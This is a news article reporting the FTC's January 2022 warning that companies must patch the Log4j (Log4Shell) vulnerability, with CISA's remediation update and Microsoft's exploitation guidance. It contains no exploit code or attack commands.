CISA
News

FTC notifies companies to take measures against Log4j software vulnerability

January 05, 2022
FTC notifies companies to take measures against Log4j software vulnerability

The Federal Trade Commission (FTC) said on Tuesday that it is critical for companies and their vendors that rely on the Log4j software vulnerability to ‘act now, in order to reduce the likelihood of harm to consumers, and to avoid FTC legal action.’ 

In its latest blog post, the FTC said that there is a risk of a loss or breach of personal information, financial loss, and other irreversible harms when vulnerabilities are discovered and exploited. The duty to take reasonable steps to mitigate known software vulnerabilities implicates laws including, among others, the Federal Trade Commission Act and the Gramm Leach Bliley Act, it added. 

The federal agency also said that failure to identify and patch instances of the Log4j software vulnerability software may violate the FTC Act. The agency said that the vulnerability is being widely exploited by a growing set of attackers, and when such vulnerabilities are discovered and exploited, ‘it risks a loss or breach of personal information, financial loss, and other irreversible harms.’ 

The FTC said that the Log4j software vulnerability is part of a broader set of structural issues, and is one of several unheralded but critically important open-source services that are used across a near-innumerable variety of internet companies. These projects are often created and maintained by volunteers, who don’t always have adequate resources and personnel for incident response and proactive maintenance even as their projects are critical to the internet economy, which is an overall dynamic that ‘the FTC will consider as we work to address the root issues that endanger user security.’

FTC called upon users of the Log4j software library to consult the Cybersecurity and Infrastructure Security Agency (CISA) guidance, and update the Log4j software package to the most current version available. FTC also urged companies to make sure remedial steps are taken and to ensure that their company’s practices do not violate the law. 

The Log4j 2 is an open-source Java logging library developed by the Apache Foundation deployed across enterprise apps and cloud services. Tracked as CVE-2021-44228 and dubbed ‘Log4Shell,’ the Log4j vulnerability is used across various consumer and enterprise services, websites, applications, and operational technology (OT) products. 

The Log4Shell vulnerability was detected on Dec. 9, and other Log4j vulnerabilities have been identified. Another Log4j update has surfaced online, patching a code execution vulnerability identified in the last week of 2021. Users have now been advised to upgrade to Log4j 2.3.2 for Java 6, 2.12.4 for Java 7, or 2.17.1 for Java 8 and later.

The CISA said that all large federal agencies have successfully mitigated the Log4j critical vulnerability. Such agencies faced a Dec. 24, 2021 deadline to remediate the vulnerability, though the CISA has not said if there were any confirmed breaches of federal agencies using the Log4j vulnerability.

“Agencies have reacted with significant urgency to successfully remediate assets running vulnerable Log4j libraries, even over the holiday season, or to mitigate the majority of affected applications identified that support ‘solution stacks’ that accept data input from the internet,” a CISA spokesperson said in a statement to MeriTalk. “CISA has received status reports from all large agencies, which have either patched or deployed alternate mitigations to address the risk from thousands of internet-connected assets, the focus of the recent Emergency Directive,” it added.

The FTC warning came as Microsoft updated on Monday its earlier guidance of the Log4j software vulnerability, where the firm cautioned that exploitation attempts and testing have remained high during the last weeks of December. 

“We have observed many existing attackers adding exploits of these vulnerabilities in their existing malware kits and tactics, from coin miners to hands-on-keyboard attacks,” Microsoft said in the guidance. “Organizations may not realize their environments may already be compromised. Microsoft recommends customers to do additional review of devices where vulnerable installations are discovered.”  

At this juncture, customers should assume the broad availability of exploit code and scanning capabilities to be a real and present danger to their environments, according to Microsoft. “Due to the many software and services that are impacted and given the pace of updates, this is expected to have a long tail for remediation, requiring ongoing, sustainable vigilance,” it added.

Anna Ribeiro
Industrial Cyber News Editor. Anna Ribeiro is a freelance journalist with over 14 years of experience in the areas of security, data storage, virtualization and IoT.

A complimentary guide to the who`s who in industrial cybersecurity tech & solutions

Free Download

Related

ASIS Foundation reports on impact of autonomous vehicles on security and technology
ASIS Foundation reports on impact of autonomous vehicles on security and technology
European Commission makes €112 million investment in AI, quantum research under Horizon Europe program
European Commission makes €112 million investment in AI, quantum research under Horizon Europe program
MITRE unveils ATT&CK v15 with upgraded detections, analytic format, cross-domain adversary insights
MITRE unveils ATT&CK v15 with upgraded detections, analytic format, cross-domain adversary insights
RMC
Risk Mitigation Consulting acquires Securicon, boosting cybersecurity and mission assurance offerings
Hackers target Tipton Municipal Utilities wastewater treatment plant, prompting federal investigation
Hackers target Tipton Municipal Utilities wastewater treatment plant, prompting federal investigation
New CGCYBER report warns of cybersecurity risks in marine environment due to network-connected OT systems
New CGCYBER report warns of cybersecurity risks in marine environment due to network-connected OT systems
Ukrainian CERT details malicious plan by Sandworm group to disrupt critical infrastructure facilities
Ukrainian CERT details malicious plan by Sandworm group to disrupt critical infrastructure facilities
DC3, DCSA collaborate to launch vulnerability disclosure program for defense industrial base
DC3, DCSA collaborate to launch vulnerability disclosure program for defense industrial base
Waterfall’s WF-600 unidirectional security gateway brings 'unbreachable protection' to OT/ICS networks
Waterfall, 2TS enter into cybersecurity alliance for African market
Honeywell’s 2024 USB Threat Report reveals significant rise in malware frequency, highlighting growing concerns
Honeywell’s 2024 USB Threat Report reveals significant rise in malware frequency, highlighting growing concerns